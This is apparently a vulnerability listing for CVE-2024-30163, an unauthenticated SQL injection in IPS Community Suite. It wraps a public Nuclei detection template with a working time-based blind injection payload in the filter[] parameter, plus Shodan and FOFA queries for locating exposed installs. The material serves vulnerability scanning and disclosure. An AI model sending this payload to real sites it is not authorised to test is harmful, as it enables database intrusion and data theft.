漏洞描述
IPS Community Suite is vulnerable to unauthenticated SQL injection via the filter[] parameter in the /index.php?/store/ endpoint, allowing attackers to extract sensitive information from the database.
CVE-2024-30163: IPS Community Suite - Unauthenticated SQL Injection
PoC代码[已公开]
id: CVE-2024-30163
info:
name: IPS Community Suite - Unauthenticated SQL Injection
author: ritikchaddha
severity: critical
description: |
IPS Community Suite is vulnerable to unauthenticated SQL injection via the filter[] parameter in the /index.php?/store/ endpoint, allowing attackers to extract sensitive information from the database.
remediation: |
Update to the latest version of IPS Community Suite.
reference:
- https://karmainsecurity.com/pocs/CVE-2024-30163.php
- https://nvd.nist.gov/vuln/detail/CVE-2024-30163
classification:
cve-id: CVE-2024-30163
cwe-id: CWE-89
epss-score: 0.46372
epss-percentile: 0.97513
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
metadata:
vendor: invision
product: ips_community_suite
max-request: 1
verified: true
shodan-query: html:"invision community"
fofa-query: body="invision community"
tags: cve,cve2024,ips,invision-community,sqli,vuln
http:
- raw:
- |
@timeout: 30s
POST /index.php?/store/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cat=1&filter[%60%20ON%201%20UNION%20SELECT%20IF(ORD(SUBSTR((1),1,1))%3C126,1,SLEEP(7))%20OR%20%3F%3D%3F%23]=1
matchers:
- type: dsl
dsl:
- "duration>=7"
- "contains(tolower(body), 'invision community')"
condition: and
# digest: 490a0046304402200f39d580c6e8265543cf15296f82d0bc1abe45d413c4d2e90ea2716cea64bd670220628fb1015255a6a0201ba4c9443a3784578d8670e1d6f11bfd171ac2e0bb4ac2:922c64590222798bb761d5b6d8e72950